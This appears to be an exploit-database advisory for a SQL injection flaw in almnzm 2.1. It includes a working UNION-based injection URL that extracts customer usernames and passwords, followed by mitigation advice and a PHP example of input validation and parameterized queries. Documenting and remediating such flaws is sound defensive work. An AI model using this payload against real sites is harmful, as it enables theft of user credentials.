vendor: almnzm
by: NeX HaCkEr
CVSS: 7,5 (HIGH)
SQL Injection
CWE: 89
Product Name: almnzm
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: almnzm
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
almnzm 2.1 <= SQL Injection Vulnerability
An attacker can exploit this vulnerability by appending a malicious SQL query to the vulnerable parameter of the application. For example, an attacker can use the following URL: index.php?a=pages&id=3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers--%20
Mitigation:
Input validation should be applied to the vulnerable parameter so that malicious SQL queries cannot be injected through it. Additionally, the application should use parameterized queries to prevent SQL injection attacks.
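The two mitigations above, applied to the id parameter from the example URL, as an added example that is not almnzm's own code. The almnzm_pages table, its columns and the function names are hypothetical, and an in-memory SQLite database with constructed rows stands in for the application's database.

```php
<?php
declare(strict_types=1);

// Constructed stand-in database; almnzm_pages and its columns are hypothetical.
function open_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE almnzm_pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    $db->exec("INSERT INTO almnzm_pages VALUES (3, 'About', 'Constructed sample page')");
    return $db;
}

// Layer 1, input validation: id must be a positive decimal integer and nothing else.
function parse_page_id($raw): ?int {
    if (!is_string($raw)) {
        return null; // rejects array input such as id[]=3
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Layer 2, parameterized query: the value is bound as data and is never
// concatenated into the SQL text, so quotes in it cannot change the statement.
function fetch_page(PDO $db, int $id): ?array {
    $stmt = $db->prepare('SELECT id, title, body FROM almnzm_pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// In the application the value would come from $_GET['id']; here two inputs
// are replayed: a normal id and the decoded id value from the URL above.
$db = open_demo_db();
$inputs = [
    '3',
    "3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers-- ",
];
foreach ($inputs as $raw) {
    $id = parse_page_id($raw);
    if ($id === null) {
        echo "rejected: id is not a positive integer (respond with HTTP 400)\n";
        continue;
    }
    $page = fetch_page($db, $id);
    echo $page ? "page {$page['id']}: {$page['title']}\n" : "page not found\n";
}
```

Either layer alone stops the request shown above; keeping both means a later change that loosens the validation still cannot alter the query text.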